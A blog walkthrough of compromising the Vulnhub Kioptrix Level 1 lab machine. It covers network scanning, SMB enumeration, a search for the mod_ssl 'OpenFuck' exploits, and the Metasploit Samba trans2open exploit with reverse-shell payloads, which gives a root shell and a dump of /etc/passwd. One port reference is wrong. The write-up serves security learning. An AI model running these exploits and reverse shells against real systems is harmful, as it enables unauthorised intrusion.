Open in app

Sign in

Write

Sign in

Kioptrix Level 1

mrZud0k0rn
14 min readSep 19, 2020

--

Today we’re going to crack our first machine along our journey. Kioptrix Level 1 and can be downloaded here .

This was supposed to be an easy box, so let’s start.

First, I downloaded the machine image and run it using my VM software. Let’s discover the machine’s IP by issuing an arp-scan command.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo arp-scan 192.168.1.0/24
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:26:ae, IPv4: 192.168.1.9
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.104 00:0c:29:52:c3:4f VMware, Inc.


9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 9
responded

Now that we got our target IP, I’d like to run threader300 by TheMayor to scan for available service or open ports.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo threader3000
[sudo] password for kali:
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Threader 3000 — Multi-threaded Port Scanner
Version 1.0.7
A project by The Mayor
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Enter your target IP address or URL here: 192.168.1.104
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Scanning target 192.168.1.104
Time started: 2020–09–01 10:44:13.263841
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Port 22 is open
Port 80 is open
Port 111 is open
Port 139 is open
Port 443 is open
Port 1024 is open
Port scan completed in 0:00:13.666572
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80,111,139,443,1024 -sV -sC -T4 -Pn -oA 192.168.1.104 192.168.1.104
************************************************************
Would you like to run Nmap or quit to terminal?
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

As we can see it is very convenient for us that Threader3000 already suggests the nmap command and flags we need to scan the services’ version and scripts for possible vulnerabilities. Let’s run the nmap now.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo nmap -p22,80,111,139,443,1024 -sV -sC -T4 -Pn -oA nmap/kioptrix1 192.168.1.104
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020–09–01 10:46 EDT
Nmap scan report for 192.168.1.104 (192.168.1.104)
Host is up (0.00037s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020–09–01T14:49:47+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:52:C3:4F (VMware)

Host script results:
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.82 seconds

Okay, we got the following ports and services’ version.

  1. Port 22
    → OpenSSH 2.9p2 (protocol 1.99)
  2. Port 80/443
    → Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
  3. Port 139/445
    → Samba smbd (workgroup: MYGROUP)
  4. Port 111/1024
    → (RPC #100000),(RPC #100024)

We now begin our ENUMERATION of our scanned ports. As my part of methodology, I will enumerate ALL scanned ports first before concluding which exploit or attack I will use.

ENUMERATION

  1. Port 139/445

Scanning for samba version using metasploit

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.1.104:139 — Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.1.104:445 — Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

NMBLOOKUP

┌──(kali㉿kali)-[~]
└─$ sudo nmblookup -A 192.168.1.104
Looking up status of 192.168.1.104
KIOPTRIX <00> — B <ACTIVE>
KIOPTRIX <03> — B <ACTIVE>
KIOPTRIX <20> — B <ACTIVE>
..__MSBROWSE__. <01> — <GROUP> B <ACTIVE>
MYGROUP <00> — <GROUP> B <ACTIVE>
MYGROUP <1d> — B <ACTIVE>
MYGROUP <1e> — <GROUP> B <ACTIVE>

MAC Address = 00–00–00–00–00–00

List down shared folders using nmap

┌──(kali㉿kali)-[~]
└─$ nmap — script smb-enum-shares -p 139 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020–09–02 11:35 EDT
Nmap scan report for 192.168.1.104 (192.168.1.104)
Host is up (0.00061s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

SMBMAP

┌──(kali㉿kali)-[~]
└─$ sudo smbmap -H 192.168.1.104 1 ⨯
[!] 445 not open on 192.168.1.104….

SMBCLIENT

──(kali㉿kali)-[~]
└─$ sudo smbclient -L \\\\192.168.1.104\\
Server does not support EXTENDED_SECURITY but ‘client use spnego = yes’ and ‘client ntlmv2 auth = yes’ is set
Anonymous login successful
Enter WORKGROUP\root’s password:

Sharename Type Comment
— — — — — — — — — — -
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY but ‘client use spnego = yes’ and ‘client ntlmv2 auth = yes’ is set
Anonymous login successful

Server Comment
— — — — — — — — -
KIOPTRIX Samba Server

Workgroup Master
— — — — — — — — -
MYGROUP KIOPTRIX

Checking for null sessions

┌──(kali㉿kali)-[~]
└─$ sudo smbclient \\\\192.168.1.104\\ADMIN$
Server does not support EXTENDED_SECURITY but ‘client use spnego = yes’ and ‘client ntlmv2 auth = yes’ is set
Anonymous login successful
Enter WORKGROUP\root’s password:
tree connect failed: NT_STATUS_WRONG_PASSWORD

Enum4Linux

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo enum4linux -a 192.168.1.104
[sudo] password for kali:
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 3 11:40:58 2020

==========================
| Target Information |
==========================
Target ……….. 192.168.1.104
RID Range …….. 500–550,1000–1050
Username ……… ‘’
Password ……… ‘’
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=====================================================
| Enumerating Workgroup/Domain on 192.168.1.104 |
=====================================================
[+] Got domain/workgroup name: MYGROUP

=============================================
| Nbtstat Information for 192.168.1.104 |
=============================================
Looking up status of 192.168.1.104
KIOPTRIX <00> — B <ACTIVE> Workstation Service
KIOPTRIX <03> — B <ACTIVE> Messenger Service
KIOPTRIX <20> — B <ACTIVE> File Server Service
..__MSBROWSE__. <01> — <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> — <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> — B <ACTIVE> Master Browser
MYGROUP <1e> — <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00–00–00–00–00–00

======================================
| Session Check on 192.168.1.104 |
======================================
[+] Server 192.168.1.104 allows sessions using username ‘’, password ‘’

============================================
| Getting domain SID for 192.168.1.104 |
============================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup

=======================================
| OS information on 192.168.1.104 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.104 from smbclient:
[+] Got OS info for 192.168.1.104 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

==============================
| Users on 192.168.1.104 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
| Share Enumeration on 192.168.1.104 |
==========================================

Sharename Type Comment
— — — — — — — — — — -
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
— — — — — — — — -
KIOPTRIX Samba Server

Workgroup Master
— — — — — — — — -
MYGROUP KIOPTRIX

[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$ [E] Can’t understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/ADMIN$ [E] Can’t understand response:
tree connect failed: NT_STATUS_WRONG_PASSWORD

=====================================================
| Password Policy Information for 192.168.1.104 |
=====================================================
[E] Unexpected error from polenum:

[+] Attaching to 192.168.1.104 using a NULL share

[+] Trying protocol 139/SMB…

[!] Protocol failed: SMB SessionError: 0x5

[+] Trying protocol 445/SMB…

[!] Protocol failed: [Errno Connection error (192.168.1.104:445)] [Errno 111] Connection refused

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

===============================
| Groups on 192.168.1.104 |
===============================

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]

[+] Getting builtin group memberships:
Group ‘Print Operators’ (RID: 550) has member: Couldn’t find group Print Operators
Group ‘Backup Operators’ (RID: 551) has member: Couldn’t find group Backup Operators
Group ‘Account Operators’ (RID: 548) has member: Couldn’t find group Account Operators
Group ‘Power Users’ (RID: 547) has member: Couldn’t find group Power Users
Group ‘Guests’ (RID: 546) has member: Couldn’t find group Guests
Group ‘Replicator’ (RID: 552) has member: Couldn’t find group Replicator
Group ‘Users’ (RID: 545) has member: Couldn’t find group Users
Group ‘System Operators’ (RID: 549) has member: Couldn’t find group System Operators
Group ‘Administrators’ (RID: 544) has member: Couldn’t find group Administrators

[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]

[+] Getting local group memberships:

[+] Getting domain groups:
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]

[+] Getting domain group memberships:
Group ‘Domain Admins’ (RID: 512) has member: Couldn’t find group Domain Admins
Group ‘Domain Users’ (RID: 513) has member: Couldn’t find group Domain Users

========================================================================
| Users on 192.168.1.104 via RID cycling (RIDS: 500–550,1000–1050) |
========================================================================
[I] Found new SID: S-1–5–21–4157223341–3243572438–1405127623
[+] Enumerating users using SID S-1–5–21–4157223341–3243572438–1405127623 and logon username ‘’, password ‘’
S-1–5–21–4157223341–3243572438–1405127623–500 KIOPTRIX\
(0)
S-1–5–21–4157223341–3243572438–1405127623–501 KIOPTRIX\ (0)
S-1–5–21–4157223341–3243572438–1405127623–502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–507 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–512 KIOPTRIX\Domain Admins (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–513 KIOPTRIX\Domain Users (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–514 KIOPTRIX\Domain Guests (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–545 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1000 KIOPTRIX\root (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1001 KIOPTRIX\root (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1002 KIOPTRIX\bin (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1003 KIOPTRIX\bin (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1004 KIOPTRIX\daemon (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1005 KIOPTRIX\daemon (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1006 KIOPTRIX\adm (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1007 KIOPTRIX\sys (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1008 KIOPTRIX\lp (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1009 KIOPTRIX\adm (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1010 KIOPTRIX\sync (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1011 KIOPTRIX\tty (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1012 KIOPTRIX\shutdown (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1013 KIOPTRIX\disk (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1014 KIOPTRIX\halt (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1015 KIOPTRIX\lp (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1016 KIOPTRIX\mail (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1017 KIOPTRIX\mem (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1018 KIOPTRIX\news (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1019 KIOPTRIX\kmem (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1020 KIOPTRIX\uucp (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1021 KIOPTRIX\wheel (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1022 KIOPTRIX\operator (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1023 KIOPTRIX\unix_group.11 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1024 KIOPTRIX\games (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1025 KIOPTRIX\mail (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1026 KIOPTRIX\gopher (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1027 KIOPTRIX\news (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1028 KIOPTRIX\ftp (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1029 KIOPTRIX\uucp (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1030 KIOPTRIX\unix_user.15 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1031 KIOPTRIX\man (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1032 KIOPTRIX\unix_user.16 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1033 KIOPTRIX\unix_group.16 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1034 KIOPTRIX\unix_user.17 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1035 KIOPTRIX\unix_group.17 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1036 KIOPTRIX\unix_user.18 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1037 KIOPTRIX\unix_group.18 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1038 KIOPTRIX\unix_user.19 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1039 KIOPTRIX\floppy (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1040 KIOPTRIX\unix_user.20 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1041 KIOPTRIX\games (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1042 KIOPTRIX\unix_user.21 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1043 KIOPTRIX\slocate (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1044 KIOPTRIX\unix_user.22 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1045 KIOPTRIX\utmp (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1046 KIOPTRIX\squid (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1047 KIOPTRIX\squid (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1048 KIOPTRIX\unix_user.24 (Local User)
S-1–5–21–4157223341–3243572438–1405127623–1049 KIOPTRIX\unix_group.24 (Local Group)
S-1–5–21–4157223341–3243572438–1405127623–1050 KIOPTRIX\unix_user.25 (Local User)

==============================================
| Getting printer info for 192.168.1.104 |
==============================================
No printers returned.

enum4linux complete on Thu Sep 3 11:41:06 2020

Okay we now we got couple of informations that we need just so we do not meet our dead end yet, we got the samba version — which we can google, and we know that null sessions or anonymous login is not permitted.

Further performing enumeration by “googling” the service version we found the smb version Unix (Samba 2.2.1a) is vulnerable against “trans2open” attack. Conviniently for us, exploit is available in metasploit. From here, let’s further enumerate other ports.

2. Port 80/443

We can perform another google since we already got the service version. This brings us to the “OpenFuck” exploit, and we googled that this exploit is also available in exploit-db so we can get a copy of the exploit by using searchsploit on our kali machine.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ searchsploit openfuck
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploit Title | Path
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Apache mod_ssl < 2.8.7 OpenSSL — ‘OpenFuck.c’ Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL — ‘OpenFuckV2.c’ Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL — ‘OpenFuckV2.c’ Remote Buffer Overflow (2) | unix/remote/47080.c
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Shellcodes: No Results

So we can read and edit these files according to our needs, compile and run it. Right now, we already 2 possible attack vector, this is the fun part of enumeration. :)

3. Port 22

We google the port service version and we come up this this exploit.

EXPLOITATION

Right now we got 3 possible exploits, and I strongly feel that each exploit will work against our target, since the machine was made to be exploited.

In this exploit, let’s try to use the port 22 samba exploit, we’ll reserve the other exploit for other day.

Exploit “trans2open” using metasploit

msf5 > search trans2open

Matching Modules
================

# Name Disclosure Date Rank Check Description
— — — — — — — — — — — — — — — — — — — — — -
0 exploit/freebsd/samba/trans2open 2003–04–07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003–04–07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003–04–07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003–04–07 great No Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index, for example use 3 or use exploit/solaris/samba/trans2open

msf5 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 139 yes The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST 192.168.1.9 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
— — —
0 Samba 2.2.x — Bruteforce

msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.9:4444
[*] 192.168.1.104:139 — Trying return address 0xbffffdfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffcfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffbfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffafc…
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.9:4444 -> 192.168.1.104:1025) at 2020–09–03 10:48:53 -0400
[*] 192.168.1.104 — Meterpreter session 1 closed. Reason: Died
[*] 192.168.1.104:139 — Trying return address 0xbffff9fc…
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] 192.168.1.104 — Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 2 opened (192.168.1.9:4444 -> 127.0.0.1) at 2020–09–03 10:48:54 -0400
[*] 192.168.1.104:139 — Trying return address 0xbffff8fc…
[*] Sending stage (980808 bytes) to 192.168.1.104
[*] Meterpreter session 3 opened (192.168.1.9:4444 -> 192.168.1.104:1027) at 2020–09–03 10:48:55 -0400
^C[-] 192.168.1.104:139 — Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(linux/samba/trans2open) > [*] 192.168.1.104 — Meterpreter session 3 closed. Reason: Died

NOTICE THAT METASPLOIT ASSIGNS DEFAULT PAYLOAD ON EVERY MODULE WE OPEN AND THE PAYLOAD WE GOT WAS A STAGED TYPE OF PAYLOAD SINCE METERPRETER SESSION IS INTERMITTENT AND KEEPS ON DISCONNECTING.

CHANGED THE PAYLOAD FROM STAGED TO NON-STAGED

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.1.9:4444
[*] 192.168.1.104:139 — Trying return address 0xbffffdfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffcfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffbfc…
[*] 192.168.1.104:139 — Trying return address 0xbffffafc…
[*] Command shell session 4 opened (192.168.1.9:4444 -> 192.168.1.104:1028) at 2020–09–03 10:49:40 -0400

whoami
root
pwd
/tmp
less /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
